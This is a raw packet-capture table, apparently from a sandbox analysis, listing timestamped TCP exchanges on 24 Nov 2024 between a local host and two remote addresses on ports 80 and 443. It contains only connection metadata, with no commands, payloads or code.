                                                                                                                                                                                                Nov 24, 2024 03:04:34.768873930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.768935919 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.768963099 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.770091057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.770147085 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.770173073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.771261930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.771394968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.771450043 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.772480965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.772598028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.772665024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.773670912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.773788929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.773840904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.774868011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.774930954 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.774950027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.776057005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.776133060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.776223898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.777273893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.777338028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.777365923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.778450012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.778542042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.778601885 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.779644966 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.779763937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.779808044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.780867100 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.780952930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.781012058 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.782051086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.782130003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.782183886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.783237934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.783348083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.783397913 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.784421921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.784573078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.784619093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.785613060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.785691023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.785720110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.786814928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.786863089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.786891937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.788016081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.788120031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.788163900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.789205074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.789336920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.789395094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.790391922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.790450096 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.790486097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.791712999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.791760921 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.791804075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.792856932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.792949915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.793004036 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.794028044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.794142962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.794193983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.795196056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.795317888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.795363903 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.796421051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.796511889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.796570063 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.797601938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.797655106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.797739029 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.820410013 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.827677011 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:34.827713966 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.903287888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.903397083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.903501987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.903877974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.903976917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.904041052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.905075073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.905201912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.905268908 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.906240940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.940939903 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.940963030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.941067934 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.941531897 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.941641092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.941690922 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.943640947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.943802118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.943866014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.944411993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.944425106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.944464922 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.945322037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.945458889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.945506096 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.946007013 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.946510077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.946564913 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.946660042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.947506905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.947545052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.947572947 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.948806047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.948942900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.949006081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.949722052 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:34.949743986 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.950025082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.950123072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.950201035 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.951096058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.951200008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.951255083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.951814890 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:34.952269077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.952317953 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.953114033 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.953975916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.954128027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.954174995 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.954758883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.954943895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.954996109 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.955979109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.956146002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.956196070 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.957009077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:34.957925081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:34.995343924 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.107003927 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.115477085 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.115511894 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.121618032 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.167366028 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.298903942 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.303442001 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.303474903 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.385857105 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.385968924 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.389015913 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.389045954 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.389797926 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.389822006 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.511889935 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.544083118 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.544121981 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.547141075 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.591334105 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.703810930 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.706753016 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.706780910 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.744535923 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.751027107 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.751045942 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.758908033 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.799335957 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.866286039 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.866368055 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.914261103 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.914324999 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:35.915410995 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:35.915463924 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.058377028 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.108683109 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.109814882 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.109884977 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.183357954 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.234345913 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.234375954 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.280602932 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.344742060 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.389933109 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.389960051 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.413796902 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.413831949 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.520745993 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.520767927 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.522295952 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.522315025 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.523883104 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.523902893 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.536820889 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.540581942 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.587340117 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.730365992 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.733575106 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.733597040 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.850004911 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.852125883 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.852147102 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.853943110 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.895344973 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.922188044 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:36.924527884 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:36.924563885 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.041987896 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.048499107 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.048521042 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.281804085 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.285406113 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.285461903 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.295331955 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.343163013 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.343192101 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.348772049 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.349426985 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.349503040 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.408571005 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.411329031 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.455338001 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.473809958 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.476696014 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.476746082 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.665812969 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.668678045 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.668704033 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.720176935 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.724217892 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.724235058 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.727659941 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.771332979 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.912237883 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.914988041 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.915024042 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:37.917062044 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:37.959340096 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.145746946 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.149331093 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.149362087 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.164345980 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.164422989 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.166518927 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.207329035 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.280920982 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.283092022 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.283126116 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.288914919 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.343059063 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.343085051 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.345662117 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.346488953 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.346522093 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.472981930 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.475542068 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.519335032 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.665087938 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.667599916 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.667630911 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.749495029 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.796228886 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.796260118 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.798916101 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.798933029 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.857274055 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.875163078 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.875211954 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.876064062 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.876079082 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.941407919 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:38.977644920 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:38.977674961 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.089648008 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.134813070 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.134845018 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.140597105 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.187340975 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.234076977 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.280551910 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.280565023 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.283893108 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.283915043 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.284008026 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.284013033 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.426012993 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.429043055 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.429065943 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.516184092 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.561794043 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.561808109 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:39.565795898 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:39.565808058 CET4434973213.107.246.63192.168.2.5
